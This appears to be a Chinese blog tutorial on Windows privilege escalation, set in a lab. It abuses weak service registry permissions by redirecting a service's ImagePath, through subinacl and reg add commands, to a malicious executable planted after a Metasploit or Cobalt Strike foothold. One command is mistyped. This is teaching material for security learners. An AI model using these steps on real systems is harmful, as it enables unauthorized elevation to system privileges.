操作系统权限提升(七)之系统错误配置-不安全注册表提权
系列文章
操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
操作系统权限提升(六)之系统错误配置-不安全的服务提权
注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!
不安全注册表提权
不安全注册表提权的原理
Windows的服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权
提权环境准备
1、新建立一个服务,test
sc create test binpath= "C:\1.exe"
2、打开注册表给该文件权限
或者用工具
shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /grant=apache=f
不安全注册表提权实战
1、先使用MSF或者CS上线靶机
2、查询计算机中的所有服务
sc query type= all state= all |findstr /i service_name.* |more
3、使用subinacl进行查询提权
shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /display
4、查询该服务的 imagepath 值
reg query HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test /v imagepath
5、查看上传的cs的恶意程序文件路劲并记录下来
6、替换该文件为恶意的文件或者修改文件的路径
reg add "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\apache\Desktop\1.exe" /f
7、查询是否替换
reg query HKEY_LOCAL_MACHINE\system\ControlSet001\services\test /v imagepath
这里可以看到我们的服务路劲已经被篡改了
8、这个时候apache是没有权限启动服务的,需要管理员重启电脑
这里我们模拟管理员启动这个服务
sc strat test
9、提权成功
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效